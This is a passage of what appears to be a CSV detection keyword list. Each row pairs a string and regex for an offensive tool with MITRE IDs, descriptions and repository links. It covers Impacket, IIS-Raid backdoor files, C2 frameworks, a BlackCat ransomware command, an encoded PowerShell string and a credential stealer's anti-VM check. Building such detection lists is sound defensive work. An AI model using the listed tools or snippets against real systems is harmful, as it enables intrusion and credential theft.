T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*If no process provided, it will attempt to inject into explorer.exe*",".{0,1000}If\sno\sprocess\sprovided,\sit\swill\sattempt\sto\sinject\sinto\sexplorer\.exe.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tools","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","10","6","524","52","2024-04-05T14:21:15Z","2023-04-05T09:39:33Z" "*if os.getlogin() in [""WDAGUtilityAccount"",""Abby"",""Peter Wilson"",""hmarc"",""patex"",""JOHN-PC"",""RDhJ0CNFevzX"",""kEecfMwgj"",""Frank"",""8Nl0ColNQ5bq""*",".{0,1000}if\sos\.getlogin\(\)\sin\s\[\""WDAGUtilityAccount\"",\""Abby\"",\""Peter\sWilson\"",\""hmarc\"",\""patex\"",\""JOHN\-PC\"",\""RDhJ0CNFevzX\"",\""kEecfMwgj\"",\""Frank\"",\""8Nl0ColNQ5bq\"".{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","10","1","57","13","2023-03-13T20:03:44Z","2022-07-22T16:30:13Z" "*If the attack is successful* you will see authentication logs of machines retrieving and executing the malicious GPO*",".{0,1000}If\sthe\sattack\sis\ssuccessful.{0,1000}\syou\swill\ssee\sauthentication\slogs\sof\smachines\sretrieving\sand\sexecuting\sthe\smalicious\sGPO.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/synacktiv/GPOddity","1","0","N/A","9","3","246","21","2023-10-14T16:06:34Z","2023-09-01T08:13:25Z" "*If XWorm Does Not work - Run This Script As Administrator!*",".{0,1000}If\sXWorm\sDoes\sNot\swork\s\-\sRun\sThis\sScript\sAs\sAdministrator!.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*if you do not use masscan you can't give me CIDR as input*",".{0,1000}if\syou\sdo\snot\suse\smasscan\syou\scan\'t\sgive\sme\sCIDR\sas\sinput.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","7","2","146","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" "*IgBJAHMAIABFAGwAZQB2AGEAdABlAGQAOgAgACQAKAAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAFAAcgBpAG4AYwBpAHAAYQBsAF0AWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMASQBkAGUAbgB0AGkAdAB5AF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAKAApACkALgBJAHMASQBuAFIAbwBsAGUAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBCAHUAaQBsAHQASQBuAFIAbwBsAGUAXQAnAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAJwApACkAIAAtACAAJAAoAEcAZQB0AC0ARABhAHQAZQApACIAIAB8ACAATwB1AHQALQBGAGkAbABlACAAQwA6AFwAVQBBAEMAQgB5AHAAYQBzAHMAVABlAHMAdAAuAHQAeAB0ACAALQBBAHAAcABlAG4AZAA=*",".{0,1000}IgBJAHMAIABFAGwAZQB2AGEAdABlAGQAOgAgACQAKAAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAFAAcgBpAG4AYwBpAHAAYQBsAF0AWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMASQBkAGUAbgB0AGkAdAB5AF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAKAApACkALgBJAHMASQBuAFIAbwBsAGUAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBCAHUAaQBsAHQASQBuAFIAbwBsAGUAXQAnAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAJwApACkAIAAtACAAJAAoAEcAZQB0AC0ARABhAHQAZQApACIAIAB8ACAATwB1AHQALQBGAGkAbABlACAAQwA6AFwAVQBBAEMAQgB5AHAAYQBzAHMAVABlAHMAdAAuAHQAeAB0ACAALQBBAHAAcABlAG4AZAA\=.{0,1000}","offensive_tool_keyword","PickleC2","PickleC2 is a post-exploitation and Lateral Movements framework","T1059.006 - T1021 - T1071 - T1550 - T1560 - T1570","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/xRET2pwn/PickleC2","1","0","N/A","10","10","82","19","2021-07-26T21:12:04Z","2021-07-13T09:16:19Z" "*Ignitetechnologies/Persistence-Accessibility-Features*",".{0,1000}Ignitetechnologies\/Persistence\-Accessibility\-Features.{0,1000}","offensive_tool_keyword","Persistence-Accessibility-Features","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/Ignitetechnologies/Persistence-Accessibility-Features","1","1","N/A","9","1","26","7","2020-05-18T05:59:58Z","2020-05-18T05:59:23Z" "*IIS-Backdoor.*",".{0,1000}IIS\-Backdoor\..{0,1000}","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","1","N/A","10","10","525","123","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z" "*IIS-Raid-master*",".{0,1000}IIS\-Raid\-master.{0,1000}","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","1","N/A","10","10","525","123","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z" "*iisreset.exe /stop*",".{0,1000}iisreset\.exe\s\/stop.{0,1000}","offensive_tool_keyword","blackcat ransomware","BlackCat Ransomware behavior","T1486.001 - T1489 - T1490 - T1486","TA0011 - TA0010 - TA0012 - TA0007 - TA0040","blackcat ransomware","N/A","Ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*ikeforce.py*",".{0,1000}ikeforce\.py.{0,1000}","offensive_tool_keyword","IKEForce","IKEForce is a command line IPSEC VPN brute forcing tool for Linux that allows group name/ID enumeration and XAUTH brute forcing capabilities.","T1110 - T1201 - T1018","TA0001 - TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/SpiderLabs/ikeforce","1","1","N/A","N/A","3","231","74","2019-09-18T09:35:41Z","2014-09-12T01:11:00Z" "*ikescan2john.py*",".{0,1000}ikescan2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*ILBypass.ps1*",".{0,1000}ILBypass\.ps1.{0,1000}","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","10","10","713","153","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" "*imaohw/nib/rsu/*",".{0,1000}imaohw\/nib\/rsu\/.{0,1000}","offensive_tool_keyword","whoami","whoami is a legitimate command used to identify the current user executing the command in a terminal or command prompt.whoami can be used to gather information about the current user's privileges. credentials. and account name. which can then be used for Lateral Movement. privilege escalation. or targeted attacks within the compromised network.","T1003.001 - T1087 - T1057 ","TA0006 - TA0007","N/A","N/A","Collection","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" "*imapattack.py*",".{0,1000}imapattack\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*imapattack.py*",".{0,1000}imapattack\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*imaprelayclient.py*",".{0,1000}imaprelayclient\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*imaprelayclient.py*",".{0,1000}imaprelayclient\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*IMDS Service Spoofing Enabled*",".{0,1000}IMDS\sService\sSpoofing\sEnabled.{0,1000}","offensive_tool_keyword","IMDSpoof","IMDSPOOF is a cyber deception tool that spoofs the AWS IMDS service to return HoneyTokens that can be alerted on.","T1584 - T1204 - T1078 - T1558","TA0007 - TA0001 - TA0002 - TA0004","N/A","N/A","Sniffing & Spoofing","https://github.com/grahamhelton/IMDSpoof","1","0","N/A","8","1","84","2","2023-11-24T23:42:48Z","2023-11-24T23:21:21Z" "*IMDSPoof Honey Token*",".{0,1000}IMDSPoof\sHoney\sToken.{0,1000}","offensive_tool_keyword","IMDSpoof","IMDSPOOF is a cyber deception tool that spoofs the AWS IMDS service to return HoneyTokens that can be alerted on.","T1584 - T1204 - T1078 - T1558","TA0007 - TA0001 - TA0002 - TA0004","N/A","N/A","Sniffing & Spoofing","https://github.com/grahamhelton/IMDSpoof","1","0","N/A","8","1","84","2","2023-11-24T23:42:48Z","2023-11-24T23:21:21Z" "*IMDSpoof*IMDS.go*",".{0,1000}IMDSpoof.{0,1000}IMDS\.go.{0,1000}","offensive_tool_keyword","IMDSpoof","IMDSPOOF is a cyber deception tool that spoofs the AWS IMDS service to return HoneyTokens that can be alerted on.","T1584 - T1204 - T1078 - T1558","TA0007 - TA0001 - TA0002 - TA0004","N/A","N/A","Sniffing & Spoofing","https://github.com/grahamhelton/IMDSpoof","1","0","N/A","8","1","84","2","2023-11-24T23:42:48Z","2023-11-24T23:21:21Z" "*IMDSpoof-main*",".{0,1000}IMDSpoof\-main.{0,1000}","offensive_tool_keyword","IMDSpoof","IMDSPOOF is a cyber deception tool that spoofs the AWS IMDS service to return HoneyTokens that can be alerted on.","T1584 - T1204 - T1078 - T1558","TA0007 - TA0001 - TA0002 - TA0004","N/A","N/A","Sniffing & Spoofing","https://github.com/grahamhelton/IMDSpoof","1","1","N/A","8","1","84","2","2023-11-24T23:42:48Z","2023-11-24T23:21:21Z" "*imp_Badger*",".{0,1000}imp_Badger.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*impacket minikerberos*",".{0,1000}impacket\sminikerberos.{0,1000}","offensive_tool_keyword","PKINITtools","Tools for Kerberos PKINIT and relaying to AD CS","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PKINITtools","1","0","N/A","N/A","6","573","72","2024-04-12T14:04:35Z","2021-07-27T19:06:09Z" "*impacket*",".{0,1000}impacket.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. Packets can be constructed from scratch. as well as parsed from raw data. and the object oriented API makes it simple to work with deep hierarchies of protocols. The library provides a set of tools as examples of what can be done within the context of this library","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacket*",".{0,1000}impacket.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. Packets can be constructed from scratch. as well as parsed from raw data. and the object oriented API makes it simple to work with deep hierarchies of protocols. The library provides a set of tools as examples of what can be done within the context of this library.","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacket-* *",".{0,1000}impacket\-.{0,1000}\s.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacket-*.tar.gz*",".{0,1000}impacket\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacket.*",".{0,1000}impacket\..{0,1000}","offensive_tool_keyword","cobaltstrike","Fileless Lateral Movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","10","10","1331","230","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" "*impacket.*",".{0,1000}impacket\..{0,1000}","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","0","N/A","N/A","6","545","93","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" "*'impacket.*",".{0,1000}\'impacket\..{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacket.dcerpc*",".{0,1000}impacket\.dcerpc.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","0","N/A","10","2","122","11","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z" "*impacket.dcerpc.v5*",".{0,1000}impacket\.dcerpc\.v5.{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004?","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","0","N/A","9","1","92","12","2024-04-17T14:03:13Z","2024-04-17T13:00:12Z" "*impacket.dcerpc.v5*",".{0,1000}impacket\.dcerpc\.v5.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","10","7","689","109","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" "*impacket.git*",".{0,1000}impacket\.git.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacket.krb5.asn1*",".{0,1000}impacket\.krb5\.asn1.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacket.krb5.ccache*",".{0,1000}impacket\.krb5\.ccache.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacket.krb5.kerberosv5*",".{0,1000}impacket\.krb5\.kerberosv5.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacket.ldap*",".{0,1000}impacket\.ldap.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacket.ldap*",".{0,1000}impacket\.ldap.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*impacket.msada_guids*",".{0,1000}impacket\.msada_guids.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacket.ntlm*",".{0,1000}impacket\.ntlm.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacket.smbconnection*",".{0,1000}impacket\.smbconnection.{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004?","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","0","N/A","9","1","92","12","2024-04-17T14:03:13Z","2024-04-17T13:00:12Z" 